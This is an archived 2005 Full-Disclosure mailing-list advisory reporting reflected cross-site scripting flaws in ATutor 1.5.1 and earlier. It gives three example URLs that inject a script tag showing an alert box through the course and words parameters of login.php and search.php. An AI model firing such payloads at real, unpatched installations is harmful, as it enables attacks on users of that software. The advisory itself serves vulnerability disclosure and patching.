[Full-disclosure] ATutor 1.5.1 and prior multiple XSS Vulnerabilities

From: h4cky0u (h4cky0u.org_at_gmail.com)
Date: 08/18/05

  • Next message: h4cky0u: "[Full-disclosure] w-agora 4.2.0 and prior Remote Directory Travel Vulnerability"
    Date: Thu, 18 Aug 2005 16:37:29 +0530
    To: full-disclosure@lists.grok.org.uk
    
    

    ATutor 1.5.1 and prior multiple XSS Vulnerabilities

    SEVERITY:
    =========
    Medium

    SOFTWARE:
    =========
    ATutor 1.5.1
    http://www.atutor.ca/

    INFO:
    =====
    ATutor 1.5.1 is a web based education portal.

    DESCRIPTION:
    ============
    The system is vulnerable to various XSS attacks:

    --==XSS==--

    Some examples -

    http://localhost/tour/login.php?course="><script>alert('Matrix_Killer
    r0X');</script>

    http://localhost/tour/search.php?search=1&search=1&words="><script>alert('There
    is no other place like
    127.0.0.1');</script>&include=all&find_in=all&display_as=pages

    http://localhost/tour/search.php?search=1&words="><script>alert('Found
    By matrix_killer');</script>&include=all&find_in=all&display_as=pages&submit=Search

    VENDOR STATUS:
    ==============
    Vendor was contacted but no response received till date.

    CREDITS:
    ========
    This vulnerability was discovered and researched by
    matrix_killer of h4cky0u Security Forums.

    mail : matrix_k at abv.bg

    web : http://www.h4cky0u.org

    Co-Researcher:
    h4cky0u of h4cky0u Security Forums.

    mail : h4cky0u at gmail.com

    web : http://www.h4cky0u.org

    Greets to all omega-team members + krassswr,EcLiPsE and all who support us !!!

    ORIGINAL:
    =========
    http://h4cky0u.org/viewtopic.php?t=2094

    -- 
    http://www.h4cky0u.org
    (In)Security at its best...
    _______________________________________________
    Full-Disclosure - We believe in it.
    Charter: http://lists.grok.org.uk/full-disclosure-charter.html
    Hosted and sponsored by Secunia - http://secunia.com/
    

  • Next message: h4cky0u: "[Full-disclosure] w-agora 4.2.0 and prior Remote Directory Travel Vulnerability"

    Relevant Pages